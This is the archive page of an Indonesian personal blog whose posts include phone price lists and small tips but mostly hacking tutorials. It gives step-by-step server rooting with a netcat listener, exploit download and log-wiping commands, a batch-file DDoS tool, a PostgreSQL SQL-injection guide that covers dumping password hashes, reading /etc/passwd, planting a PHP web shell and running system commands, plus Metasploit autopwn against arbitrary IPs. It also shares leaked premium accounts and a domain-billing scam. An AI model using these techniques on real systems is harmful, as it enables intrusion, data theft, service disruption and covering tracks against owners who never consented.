Jumat, 10 Januari 2014

Sebuah Arti :* :*

ENTAH apa artinya sebuah kehidupan . kisah suka dan duka , tawa dan tangisan datangnya seperti angin , lembut tapi hilang sekejap mata . KEBAHAGIAN pasti selalu menanti di depan , itulah hal pasti dalam sebuah kehidupan .

Sabtu, 18 Mei 2013

Daftar Harga Hp Android

Daftar Harga Hp Android - Sudah tidak kaget lagi Hp canggih sebagai pelengkap kebutuhan di zaman modern ini , mulai dari BB yang sudah banyak di pakai kalangan menengah .Saat ini android pun tidak kalah dengan bermacam fitur canggih yang di sediakan .Berikut beberapa list harga Hp Android ,yang mungkin bisa di gunakan sebagai pacuan antara Hp Android lokal dan luar .





Daftar Harga Hp Android Samsung :  
1. Samsung Android I9300 Galaxy S III

       Harga Baru     :  Rp 5.950.000,00
       Harga Bekas  :  Rp 5.250.000,00 

2. Samsung Android I9100 Galaxy S II 

       Harga Baru    : Rp 4.750.000,00
       Harga Bekas  : Rp 4.000.000,00

3. Samsung Android B7510 Galaxy Pro 

       Harga Baru    : Rp -
       Harga Bekas  : Rp 1.250.000,00

4. Samsung Android GT-N7000 Galaxy Note

       Harga Baru: Rp 4.900.000,00
       Harga Bekas: Rp 4.500.000,00

5. Samsung Android I9070 Galaxy S Advance

       Harga Baru: Rp 3.200.000,00
       Harga Bekas: Rp 2.750.000,00

6. Samsung Android S 5300 Galaxy Pocket

       Harga Baru: Rp 1.080.000,00
       Harga Bekas: Rp 850.000,00

7. Samsung Android Galaxy Ace Plus S7500

       Harga Baru: Rp 2.100.000,00
       Harga Bekas:  Rp 1.750.000,00

8. Samsung Android Galaxy mini 2 S6500

       Harga Baru: Rp 1.660.000,00
       Harga Bekas: Rp 1.250.000,00

9. Samsung Android Galaxy Y Duos S6102

       Harga Baru: Rp 1.350.000,00
       Harga Bekas: Rp 1.150.000,00

10. Samsung Android I8150 Galaxy W

       Harga Baru: Rp 2.300.000,00
       Harga Bekas: Rp 1.850.000,00

11. Samsung Android i9250 Galaxy Nexus

       Harga Baru: Rp 3.725.000,00
       Harga Bekas: Rp 2.850.000,00

12. Samsung Android Galaxy Y S5360

       Harga Baru: Rp 1.060.000,00
       Harga Bekas: Rp 800.000,00

13. Samsung Android i509 Galaxy Y CDMA

       Harga Baru: Rp 1.025.000,00
       Harga Bekas: Rp 810.000,00

14. Samsung Android I9003 Galaxy SL 4 GB

       Harga Baru     : -
       Harga Bekas  : Rp 2.000.000,00

15.  Samsung Android I9003 Galaxy SL 16 GB

       Harga Baru     : -
       Harga Bekas  : Rp 2.150.000,00

16. Samsung Android Nexus S i9023

       Harga Baru     : Rp -
       Harga Bekas  : Rp 2.250.000,00

17. Samsung Android Gio S 5660

       Harga Baru     : Rp -
       Harga Bekas  : Rp 1.350.000,00

18. Samsung Android Galaxy Fit S 5670

       Harga Baru     : Rp -
       Harga Bekas  : Rp 1.200.000,00

19. Samsung Android Galaxy Mini S 5570

       Harga Baru     : Rp -
       Harga Bekas  : Rp 850.000,00

20. Samsung Android S 5830 Galaxy ACE

       Harga Baru     : Rp -
       Harga Bekas  : Rp 1.450.000,00

21. Samsung Android I9000 Galaxy S

       Harga Baru     : -
       Harga Bekas  : Rp 1.900.000,00

22. Samsung Android I5503 Galaxy 5

       Harga Baru     : Rp 920.000,00
       Harga Bekas  : Rp 700.000,00

23. Samsung Android i5510 Galaxy 551

        Harga Baru     : Rp -
        Harga Bekas  : Rp 975.000,00

24. Samsung Android I5700 Galaxy Spica

        Harga Baru     : -
        Harga Bekas  : Rp 850.000,00

Daftar Harga HP Android Huawei Mei 2013
1. Harga HP Android Huawei Honor, Rp. 2.600.000,-
2. Harga HP Android Huawei Ideos X3, Rp. 1.100.000,-
3. Harga HP Android Huawei Vision, Rp. 2.100.000,-

Daftar Harga HP Android LG Mei 2013
Harga HP Android LG Optimus 4X HD P880, Rp. 5.700.000,-
Harga HP Android LG P970 Optimus Black, Rp. 2.870.000,-
Harga HP Android LG P698 Optimus Net Dual, Rp. 1.550.000,-
Harga HP Android LG Optimus Pro C660, Rp. 1.675.000,-
Harga HP Android LG Optimus 2x, Rp. 4.200.000,-
Harga HP Android LG Optimus L3 E400, Rp. 1.250.000,-
Harga HP Android LG E510 Optimus Hub, Rp. 1.750.000,-
Harga HP Android LG Optimus L7 P700, Rp. 2.450.000,-

Semoga bermanfaat untuk anda yang sedang mencari referensi harga untuk membeli Hp Android ^_^  .

 


Minggu, 05 Mei 2013

Tutorial Rooting Server

Haii sobat H*cker "mungkin" :D  ,udah lama banget ane gak post nih . kali ini ane mau kasih tutor buat Rooting Server .Okee langsung di gass aja biar greget.

Aplikasi yang di butuhkan :
  1. NetcaT 
  2. Shelled site
  3. Local root expl0it
Langkah-langkang yang perlu di lakukan :

1.  Langkah pertama buka CMD ,lalu ketik perintah:  
 cd C:\Program Files\Netcat 

(Pastikan bahwa Netcat anda disimpan di direktori berikut).













2. Ketik :  nc -n -l -v -p 443 ,seperti gambar di bawah :












3. Sekarang waktunya untuk membuka shell anda kemudian hubungkan kembali menggunakan shell anda (Pastikan bahwa Anda tidak menggunakan VPN atau proxy). Kemudian setelah sambungan dibuat ,cek seperti yang ditunjukkan gambar di bawah.
4. Setelah berhasil tersambung .. Sekarang kita harus mendapatkan Exploit Local Root kami, seperti di bawah  2.6.18-374 2011.

5. Pada langkah ini kita harus meng-upload eksplot kita , jadi daripada membuang-buang waktu kita untuk mencarinya .. kita hanya tinggal mengubah direktori ke folder / tmp yang merupakan folder standar.
Ketik perintah ini untuk mengubah dir / tmp:
cd /tmp

6. Untuk meng-upload  eksploit Anda, saya akan menggunakan fungsi wget.Ketik perintah berikut :
wget http://www.somesite.com/exploit.c
Sekarang saatnya meng-upload eksploit kita dalam folder tmp.
 









(Kasus 1) jika Anda telah meng-upload eksploit Anda di c (exploit.c). Kita perlu melakukan kompilasi, untuk kompilasi kita ketik perintah berikut.
ketik :
gcc exploit.c -o exploit
(Kasus 2) Jika Anda telah meng-upload eksploita Anda dalam file zip maka Anda harus unzip dengan mengetikkan perintah di bawah ini. 
ketik : 
unzip exploit.zip
7. Setelah kamu telah melakukan semua langkah di atas dengan benar, saatnya untuk memberikan izin . ketik perintah berikut  :
chmod 777 exploit
8. Sekarang waktunya untuk menjalankan Exploit, untuk melakukannya ketik perintah berikut :
./exploit
9. Sekarang eksploit akan Root ke server . Untuk memeriksanya ketik perintah : 
id or whoami
10. Membersihkan Log:
Sekarang saatnya kita untuk membersihkan trek Anda atau Log. jadi di bawah ini adalah beberapa perintah untuk menghapus file log :
rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout
rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp
history -c
find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;
 
Selamat mencoba ^_^ ,mudah-mudahan berhasil yaa gan :) .
Link Download 
  
  

Minggu, 30 Desember 2012

Premium Accounts 30-11-2012 Premium Cookies Updated Fast-debrid, Filefactory,Filemash

Premium Accounts 30-11-2012 Premium Cookies Updated Fast-debrid, Filefactory,Filemashine,Filesmonster,Ryushare,JDownloader2 end more...

[Image: 12f7c1217586398.jpg]

New Fresh Working

1./ Free All Premium Accounts , Premium Cookies, Premium JavaScript and Premium Links Generator 100% Working Updated - 30/11/2012 - 12/1/2012 – Huge Collection - (300 Premium Accounts)

2./ JDownloader Premium Accounts Database Script 100% Working Updated -30/11/2012 - 12/1/2012 – with proof

3./ JDownloader2 Premium Accounts Database 100% Working Updated - 11/30/2012 – 5x with proof – Huge Database

4./ big gift
for xxx lover

ALL 100% WORKING ON TIME OF POSTING

download from :
ul.to
3,15 mb

Download Disini

Rabu, 26 Desember 2012

Cara Mendapatkan Unlimited Top-Level Domain (TLD) Gratis .

Nah bagi kalian yang ingin mendapat domain .com .org .net .info .biz .name secara gratis , silakan ikuti langkah-langkah berikut!

1.  Daftar di sini untuk mendapatkan akunnya.














2. Jika sudah daftar, silakan Sign Out dari akun & biarkan akun tersebut selama 1 atau 2 hari lebih supaya akunnya tidak ditutup sama pihak Intuit. (Kalau saya sampai 2 hari, biar lebih afdol)
3. Setelah sudah 1 atau 2 hari kemudian silakan Sign In kembali di Intuit, lalu klik "Choose a domain (www.yourname.com) for your website".
4. Masukkan nama domain yang kalian inginkan.
4. Jika domain yang kalian inginkan tersedia klik "Get Domain".
5. Selanjutnya isi semua data seperti Nama, Email, Nomor HP, dll.















6. Berikutnya, jangan dicentang Domain Privacy, centang I agree to the Terms of Service dan Submit.















 7 . Kemudian akan muncul halaman pop out yang tujuannya untuk meminta informasi dan alamat penagihan domain kalian (Domain yang kalian minta gratis, tapi untuk melindungi terhadap penipuan mereka membutuhkan informasi penagihan domain kalian.). Pada bagian Credit Card, masukkan Credit Card khususnya, silakan isi seperti di gambar!















8. Terakhir klik Purchase dan selamat Anda sudah mendapatkan Top-Level Domain (TLD) 1 tahun gratis!















9. Untuk mengatur Nameserver atau DNS nya silakan tunggu 24 jam sampai proses domain selesai.















10. Jika kalian mau order domain lagi cukup dihapus saja domain yang sebelumnya. (Domain tidak akan mati). Pastikan juga Nameserver atau DNS nya sudah diatur.




























11. Dan ulangi lagi seperti nomor 4, begitulah sampai seterusnya. Tidak perlu menunggu 1 atau 2 hari lagi.

Dengan satu akun kita bisa order domain sepuasnya.

NB: 
Bagi yang sudah punya akun Intuit yang dulu/sebelumnya bisa juga pakai cara ini.
Nameserver atau DNS hanya bisa digantikan sekali saja.
Domain hanya gratis 1 tahun dan tidak bisa diperpanjang.
Tolong jangan memperjualbelikan domain ini supaya trik ini tidak mati.

sumber : Putra.la

Senin, 24 Desember 2012

Cara Membuat Aplikasi DDOS Menggunakan Script

Membuat Alat Serangan DDOS Dengan Notepad
Di sini saya hanya ingin berbagi dengan Anda bagaimana untuk membuat
aplikasi DDOS (Distributed Denial of Service) dengan bantuan sebuah file batch ..
Sesuatu yang perlu kita lakukan sebagai berikut ..

1.Open Notepad

2.Copy script ini ke notepad :


@echo off
mode 67,16
title DDOS Attack
color 05
cls
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo DDOS Bayu Ae
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
set /p x=Apa-Target Loe:
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ping %x%
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=Ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0c
echo Serang Server %m%
ping %m% -i %n% -t >nul
goto DDOS


3.Simpan sebagai batchfile.
contoh: DDOS.bat


Cara Menggunakan
Di -Sasaran Server masukan menu
alamat web / Ip teman Anda bahwa Anda ingin DDOS
misalnya seperti ini:


klik untuk membuka  file batch ..

masukan  situs korban
















mendapatkan IP Korban
 
 
 
 
 
 
 
 
 
 
 
 
 
 
Dan kemudian masukan hasil IP ping di host dan
Ukuran paket untuk itu untuk mengirim jumlah byte menjadi
Ukuran terserah Anda
misalnya seperti ini
 
 
 
 
 
 
 
 
 
 
 
 
 
 
kemudian tekan "ENTER" hasil seperti ini
 
 

Hiding Folders and Files in Android

Jika Anda ingin menyembunyikan video, foto atau file rahasia lain dalam ponsel android Anda, Sehingga tidak menampilkan foto dan video dalam galeri dan video player, ikuti langkah berikut:

1: Instal file manager di ponsel android Anda,pergi ke android market dan cari file manager lalu install .

2: Buka file manager dan kebagian folder yang ingin Anda sembunyikan. (Jika Anda ingin menyembunyikan file spesifik tertentu, yang menempatkan mereka dalam folder).

3: Ubah nama folder dimulai dengan "." (titik) Contoh: Jika Anda ingin menyembunyikan "video" folder, kemudian mengubah nama folder untuk "video."    .

4: Anda telah selesai, Android galeri dan pemutar video tidak akan mengenali folder itu lagi. Jika Anda ingin unhide , ubah nama folder dan hapus "." (titik).


Selamat Mencoba :)

sql injection new trick with 0x01 Find errors

0x00 Introduction



The article deals with the peculiarities of SQL-injection vulnerability in the
code DBMS PostgreSQL. Although now rarely seen in the DBMSs using this web
programming, but still it happens.

Article amended since the last publication.



0x01 Find errors



So, we have substituted in the quote option, and what do we see? Here are some
typical errors, with whom we work:

Code:

Warning: pg_query(): Query failed: ERROR: syntax error at or near "\"
at character...

Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: syntax error at or
near "\" at character...

[Warning] pg_query(): Query failed: ERROR: unterminated quoted string at or
near "'" at character...

Warning: PostgreSQL query failed: ERROR: parser: parse error at or near
"\" in...

The presence of these errors on the 90% guarantee us the opportunity to have
the injection.



0x02 Comments and whitespace



Whitespace can be used are the same as in MySQL, but the comments the situation
is somewhat different in PostgreSQL query chop off the comment "/ *"
will not work. He rugnetsya this error:

Code:

Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: unterminated /*
comment at or near "/*"

as such a comment must be closed. In this regard, we will use a "-"
that all the comments out after the end of the line.



0x03 Displays system information



Analogues team user() from MySQL to PostgreSQL as much as much as 4 pieces:

user

current_user

session_user

getpgusername()



Output version: version()

The output database: current_database()

Derivation of the database server IP: inet_server_addr()

The output port of the database server: inet_server_port() (by default 5432)



Derive the necessary information, it is convenient to make one request:

Code:

http://www.site.com/index.php?id=27+and
... T+version(
)||chr(58)||current_user||chr(58)||current_database())+as+int)--

And we get such a response from the server:

Code:

Warning: pg_query(): Query failed: ERROR: invalid input syntax for integer:

"PostgreSQL 7.4.19 on i686-redhat-linux-gnu, compiled by GCC gcc (GCC)
3.4.6 20060404 (Red Hat 3.4.6-9):ed:sedbtac" in...

This version : PostgreSQL 7.4.19 on i686-redhat-linux-gnu, compiled by GCC gcc
(GCC) 3.4.6 20060404 (Red Hat 3.4.6-9)

User : ed

DB : sedbtac



Here it is worth paying attention to the query, PostgreSQL is very jealous of
data types, so the result should lead to an artificially required (in the sense
of what we want =)) data type. You can do this function cast (expression + as +
type), or use a particular construction of "expression :: type ', which is
there for historical reasons). For example, id=27+and+1=version()::int--



Two straight line "||" unite all in one line, chr(58) - is the
delimiter ":".



Since PostgreSQL supports the separation of queries using a ";" it is
possible to derive such an alternative version of the method:

Code:

id=27;select+version()::int--

or



Code:

id=27;select+cast(version()+as+int)--

0x04 Selection of the number of columns



Columns can be selected in several ways.



1# Using the construction of ORDER BY:

Code:

id=27+order+by+100--

In the case of fewer columns will return an error:

Code:

Warning: pg_query(): Query failed: ERROR: ORDER BY position 100 is not in
select list in...

2# ORDER BY in a query (My favorit):

Code:

id=27+order+by+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,...

Derived from the subtract one number and get the number of columns.



3# You can select the right design UNION+SELECT+NULL:

Code:

id=27+union+select+null,null,null,...

until there is no error.



4# Or pick up substituting numbers as in MySQL:

Code:

id=27+union+select+1,2,3,...

However, if the number of columns is incorrect, then return an error:

Code:

Warning: pg_query(): Query failed: ERROR: each UNION query must have the same
number of columns in...

And if the correct number of columns as strict typing here, then return an
error about an invalid type conversion, for example:

Code:

Warning: pg_query(): Query failed: ERROR: UNION types date and integer cannot
be matched in...

Of all the methods listed above rational, of course, use the construction of
ORDER BY.



0x05 System tables



To select the columns we have learned, it remains to find out how, and indeed,
from print.



Consider the utility system tables in PostgreSQL:



# pg_user



The field (type) Description

usename (name) - Login

usesysid (int4) - Id

usecreatedb (bool) - Whether the user can create a database

usesuper (bool) - whether the user has superuser privileges

usecatupd (bool) - Whether the user can make changes to system tables

passwd (text) - password (here are asterisks "****", but not the
password is essentially the same analogy as in the /etc/passwd and /etc/shadow)

valuntil (abstime) - Account expiration time (I mean, how many live session
user authentication using a password)

useconfig (text[]) - Default session for the configuration variables at work



As we can see, the information in this table is more informative, because the
password is contained in another table:



# pg_shadow



The field (type) Description

usename (name) - Login

usesysid (int4) - Id

usecreatedb (bool) - Whether the user can create a database

usesuper (bool) - whether the user has superuser privileges

usecatupd (bool) - Whether the user can make changes to system tables

passwd (text) - Password

valuntil (abstime) - password expiration time

useconfig (text[]) - Default session for the configuration variables at work



It is from pg_shadow we can remove passwords database (similar to mysql.user),
but most of the access to this table, no.



# pg_database



In this table, we are interested in only one field - datname, which stores the
names of available databases



# information_schema.tables and information_schema.columns



It's all standard, the same field names (table_name, column_name, table_schema
...).



0x06 Listing information



So we finally got to the conclusion, with regards to design everything here is
similar to MySQL and MSSQL, for example, to display the table name from
information_schema.tables we need to do, for example, this query:

Code:

id=27+union+select+1,table_name,3,...+from+informa tion_schema.tables--

But in order to scroll through the values ​​of the
fields, just limit +1,1 there is not a ride, you should use the
following construction:

Code:

id=27+union+select+1,table_name,3,...+from+informa
tion_schema.tables+limit+1+offset+1--

In this case, we iterate through here by offset.



If you want to display the names of specific table column, make a standard
request:

Code:

id=27+union+select+1,column_name,3,...+from+inform ation_schema.columns+where+table_name='table_name'

But as the quotation is likely to be filtered out, then we have two outputs,
you can first convert the table name in the chr(), for example, if we want to
get the name of the table columns pg_user, then the query would be:

Code:

...+where+table_name=CHR(112)||CHR(103)||CHR(95)||
CHR(117)||CHR(115)||CHR(101)||CHR(114)

But in PostgreSQL, starting with version 8, there was a very handy feature (my
dream - the same feature in MySQL), instead of the quotes you can use two
consecutive dollar signs, that is going to work this design:

Code:

...+where+table_name=$$table_name$$

Function concat() is not in PostgreSQL, string concatenation is performed by
two lines sticks "||":

Code:

id=27+union+select+usename||chr(58)||passwd,null,n
ull,null,null,null+from+pg_user--

Available construction LIKE:

Code:

id=27+union+select+table_name,null,null,null,null,
null+from+information_schema.columns+where+column_ name+LIKE+$$%password%$$--

In this case %password% must be enclosed in quotes.



The IF is used only for internal functions, and useless for injection, instead
you can use the CASE:

Code:

CASE WHEN condition THEN result

[WHEN ...]

[ELSE result]

END

For example:

Code:

id=27+and+1=cast((SELECT+CASE+WHEN+(1=1)+THEN+$$A$ $+ELSE+$$B$$+END)+as+int)--

This expression returns a result of our "A".



You can use an alternative conclusion:

Code:

id=27;select+cast(usename||chr(58)||passwd+as+int) +from+pg_user--

0x07 Executing commands



Oh and lastly, the most interesting, to execute commands to the database, you
need to have the privilege usesuper.



With the execution of commands you can do anything from reading files on the
server to fill a shell, would be right)

In PostgreSQL, as well as in MSSQL, you can share queries with a -
";".



Read /etc/passwd:

id=27;CREATE TABLE aaaa (b text); / * create the table "ahhh" with
column "b" type of text * /

id=27;COPY ahhh FROM '/etc/passwd'; / * copy to the table "ahhh" the
contents of /etc/passwd * /

id=27+union+select+b+from+aaaa+limit+1+offset+0-- / * read the contents of the
table * /

id = 27; DROP TABLE aaaa; / * for a clean, remove the table, "aaaa" *
/

Fill the shell:

id=27;CREATE TABLE ahhh (b text); / * create the table "ahhh" with
column "b" type of text * /

id=27;INSERT INTO аааа(b) VALUES ('<? pasthru($_GET[cmd]); ?>'); / *
insert in the "b" table "ahhh" poisonous code * /

id=27;COPY аааа (b) TO '/tmp/shell.php'; / * Copy the contents of the
"b" in the file shell.php * /

id=27;DROP TABLE aaaa; / * for a clean, remove the table, "aaaa" * /

Create a new account:

Code:

id=27;CREATE USER myname PASSWORD 'mypass';

Writing to user rights to create new databases and new users:

Code:

id=27;ALTER USER test1 CREATEUSER CREATEDB;

0x08 Creating functions



1# In the PostgreSQL <8.1 it is possible to add a function from the library:



Create a table with columns stdout id, system_out.

Code:

CREATE TABLE stdout(id serial, system_out text)--

Create a function system().

Code:

CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system'
LANGUAGE 'C' STRICT--

Execute arbitrary commands and record the results of its implementation in the
/tmp/test.

Code:

SELECT system('uname -a > /tmp/test')--

Copy the data from /tmp/test the table stdout.

Code:

COPY stdout(system_out) FROM '/tmp/test'--

Printing data on the screen.

Code:

UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL
LIMIT 1 OFFSET 1--

2# A bit of a different plperl:



Create a language if it has not been established.

Code:

CREATE LANGUAGE plperlu

Create a function spyder().

Code:

CREATE FUNCTION spyder(text) RETURNS text AS 'open(FD,"$_[0]
|");return join("",);' LANGUAGE plperlu;

Execute the command and output to the screen.

Code:

SELECT+spyder('uname -a')::int--

#3 And finally, through the plpython:



Create a function spyder().

Code:

CREATE FUNCTION spyder(text) RETURNS text AS 'import os; return
os.popen(args[0]).read()' LANGUAGE plpythonu;--

Enjoy the performance of team.

Code:

SELECT+spyder('uname -a')::int--

4# If we set a procedural language plpgsql:

Code:

select lanname from pg_language where lanname='plpgsql'

You can not with a limit, and output the contents of the table with one request

To do this, create a function:

Code:

CREATE OR REPLACE FUNCTION getall (text,text,text,text,text) RETURNS text AS
$func$

DECLARE

schema ALIAS FOR $1;

table ALIAS FOR $2;

column1 ALIAS FOR $3;

column2 ALIAS FOR $4;

column3 ALIAS FOR $5;

count int;

i int;

temp text;

int_test text;

input_refc refcursor;

BEGIN

int_test := $qr$Result : $qr$;

OPEN input_refc FOR EXECUTE $qr$SELECT count($qr$ || quote_ident(column1) ||
$qr$) from $qr$ || quote_ident(schema) || $qr$.$qr$ || quote_ident(table);

FETCH input_refc into count;

CLOSE input_refc;

count := count - 1;

BEGIN

FOR i in 0..count LOOP

OPEN input_refc FOR EXECUTE $qr$SELECT $qr$ || quote_ident(column1) ||
$qr$||chr(58)||$qr$ || quote_ident(column2) || $qr$||chr(58)||$qr$ ||
quote_ident(column3) || $qr$||$sep$<BR>$sep$ FROM $qr$ ||
quote_ident(schema) || $qr$.$qr$ || quote_ident(table) || $qr$ LIMIT 1 OFFSET
$qr$ || i;

FETCH input_refc into temp;

CLOSE input_refc;

int_test := int_test || temp;

END LOOP;

RETURN int_test;

END;

END;

$func$ LANGUAGE plpgsql;

Function getall () receives 5 ​​parameters

1 - the name of the database

2 - Name of table

3,4,5,6 - the names of the columns



The function is aimed at use in the construction of Union, the tag acts as a
separator unnecessarily, for example:

Code:

id=-27 union select getall('information_schema','columns','column_name
','table_name','table_schema')



0x09 Blind Injection



In the blind injection / in the presence of filters (cut union,cast,';') in
PostgreSQL can be used get_byte() instead of the combination of ascii() and
substr():

Code:

http://site.com/index.php?val=27
and get_b4.yte((select version())::bytea,0)=80 // PostgreSQL 8.2

Code:

http://site.com/index.php?val=27
and get_byte((select table_name from information_schema.tables limit 1 offset
0)::bytea,0)=112 // pg_type

In some special cases, delusions and perverted may be helpful feature
position(), an analogue of locate() in MySQL.

For example, a character by character and position of the substring to pull out
of the config ip-addresses are allowed remote access without a password (known
as the $$ is used to circumvent filtering quotes):



Code:

http://site.com/index.php?val=27
and position($$%20%20%20%20%20trust$$ in
(pg_read_file($$pg_hba.conf$$,0,10000)))=3516

Code:

http://site.com/index.php?val=27
and get_byte((pg_read_file($$pg_hba.conf$$,0,10000))::bytea,3498)=49 //
127.0.0.1/32

Forgot to say more about the function strpos(), as an alternative position():

Code:

http://site.com/index.php?val=27
and strpos(pg_read_file($$pg_hba.conf$$,0,10000),$$%20%20%20%20%20trust$$)=3516

Beberapa Web Berguna Untuk Hacking

-To check if a port is open:

http://www.canyouseeme.org/

-To multiple scan a file for viruses:

http://vscan.novirusthanks.org/

-The best online dork scanner out here:

http://dreamkiller.byethost17.com/sqli/

-To check if a site is down:

http://www.downforeveryoneorjustme.com/

-A place to get newest exploits:

http://www.exploit-db.com/

-Lets other people view your inserted text:

http://pastebin.com/

-The free online crypting + decrypting service:

http://www.crypo.com/

-An online MD5 decrypter:

http://www.md5decrypter.com/

-The best online Admin Page Finder:

http://sc0rpion.ir/af/

-Online WPA cracker:

http://wpa.darkircop.org/

-Online Fake Mailer:

http://emkei.cz/
-A mailing site ( it gives you a temporary email account to send and receive messages ):

http://10minutemail.com/10MinuteMail/index.html

-It gives you alternatives for program's:

http://alternativeto.net

-Upload and send files to friends etc. Very quick:

http://ge.tt/


-The best online Admin Page Finder:

http://sc0rpion.ir/af/

-Online WPA cracker:

http://wpa.darkircop.org/

-Online Fake Mailer:

http://emkei.cz/


http://10minutemail.com/10MinuteMail/index.html

Hack Any Computer With An ip [MetaSploit]

Saya di sini akan menunjukkan hal ajaib yang disebut Metasploit yang memungkinkan Anda untuk hack komputer ANYunpatched dengan hanya menggunakan IP . Mari kita mulai ...
1) Pertama. Anda perlu men-download Metasploit. Yang paling up-to-date versi GRATIS di Sini


2.) Anda perlu PostgrSQL untuk database Anda. Download di sini:


3) Sekarang mari kita ke bisnis ... Setelah menginstal kedua alat, membuka admin gui PostgrSQL (start -> all program-> PostgreSQL 9.0 -> pgAdmin III). Kemudian klik kanan pada server Anda (in the left hand box) dan klik connect. Ingatlah untuk menjaga jendela ini terbuka sepanjang waktu. Anda juga akan membutuhkan pass , lihat pada langkah 5 ...

4.) Time to hacking! Pergi start-> all program -> Metasploit Framework, dan kemudian buka gui Metasploit. Biarkan itu memuat sampai terlihat seperti ini:

 
5) Sekarang, ketik di window:
db_connect postgres: ThePassYouChose @ localhost: 5432
Pertama kali Anda melakukan ini, Anda akan melihat banyak teks flash buy. Jangan khawatir, ini biasa saja


6.) Db_host Type untuk memastikan Anda terhubung dengan benar.
 
7.) Sekarang ketik:
db_nmap 000.000.000.000

Pastikan Anda menempatkan ip dari komputer Anda mencoba untuk hack di tempat 000.000.000.000 ...


8.) Sekarang kita sampai ke bagian yang menyenangkan, eksploitasi otomatis. Ketik saja:
 db_autopwn-t-p-e-s-b, start auto-eksploitasi,

9.) Setelah eksploitasi dilakukan, jenis sesi-l untuk melihat apa pemindai ditemukan. Jika semua berjalan dengan baik, Anda akan melihat daftar eksploitasi.


10.) Sekarang kita bisa menggunakan eksploit untuk hack komputer! Jika Anda akan melihat, semua eksploitasi  nomor, dan mereka semua memiliki nama yang jelas (yaitu, reverseScreen_tcp). Untuk menggunakan eksploitasi, ketik ini:
sesi-i ExploitNumber

Best P3rL sH3LL

Dalam posting ini saya akan berbagi Shell  dan Perl.

Semoga Anda menikmati ^_^


download  <<<<

Cheat BaseBall Heroes Di Facebook. Hack Lucky,Hack Power,Hack Contact Hit On BaseBall Heroes

Udah lama gak ngePost nihh :D ,oke kali ini saya mau berbagi Cheat Baseball Heroes .Langsung aja ke TKP :)

tool yang di gunakan :
Selanjutnya :
  1. Download dan install Cheat Engine 
  2. Buka game Baseball Heroes 
  3. Buka Cheat engine
  4. Klik Play Ball ,di game Baseball Heroes 
Kembali ke Cheat Engine (CE)

  1. Untuk mozilla Process Plugin-Container.axe 
  2. Ganti Value type menjadi Double
  3. Ubah Value menjai 0.07
  4. Lalu scan 
  5. Cari kode yang berakhiran 50,60.68 (cek gambar)
  6. Klik 3 address tersebut kemudian ganti value menjadi 9999 / terserah anda (lihat gambar)
  7. Bermainlah seperti biasa dan lihat, saat bermain anda akan selalu Lucky Hit,  Contact Hit, Power Hit, Home Run :D .


    8. Selamat mencoba ^_^












Kamis, 25 Oktober 2012

Cara Pasang Widget Alexa Rank di Blog Ini buat sobat yang masih bingung tentang Pasang widget alexa.  Sebelum langsung ke topik utama yaitu tentang langkah - langkah memasang widget alexa ke blog, ada baiknya anda mengetahui manfaat apa yang akan di dapat dengan memasang alexa widget tersebut, pada posting sebelumnya sudah Kolom Bog GRATIS sebutkan salah satu cara meningkatkan Alexa Rank atau peringkat alexa blog atau website adalah dengan cara memasang widget alexa rank di blog atau website sobat dan sudah teruji sob,...

Alexa rank akan membuat peringkat berdasarkan banyaknya pengunjung blog atau web, semakin banyak pengunjung terhadap suatu blog atau web maka alexa rank akan semakin baik. Darimana alexa mengetahui jumlah kunjungan terhadap suatu web atau blog? Alexa Rank akan mengetahui jumlah kunjungan suatu website atau blog sobat berdasarkan informasi dari komputer yang browser internetnya memasang alexa toolbar, jika sobat ingin memasang alexa toolbar silakan ikuti panduannya sampai selesei,...

Tidak semua orang memasang alexa toolbar di browser, justru itulah maka muncul alternatif lain bagi pemilik blog atau web untuk mendapatkan data yang akurat tentang banyaknya kunjungan yaitu dengan Pasang alexa widget pada blog atau web yang di miliki. Dengan memasang alexa widget di blog, maka mesin alexa akan mengetahui secara akurat berapa pengunjung serta Page view ( halaman yang di lihat ) pada web atau blog sobat. berikut langkah - langkahnya Cara mudah Pasang Widget Alexa Rank Di Blog :


..:: Langkah Pertama Pasang Alexa ::..
  1. Klik Alexa.com Widget ]>>
  2. Masukan URL blog
  3. Klik “ Build Widget ”.
  4. 3 ukuran widget yang bisa sobat pilih, copy kode yang ada di sampingnya lalu paste pada notpad atau text editor lainnya.
  5. Simpan kode tersebut di komputer sobat untuk nanti di masukan ke rancangan html website atau blog sobat.
..:: Langkah Kedua Pasang Alexa ::..
  1. Login ke blogger
  2. Klik Tata Letak.
  3. Klik tab Elemen Halaman.
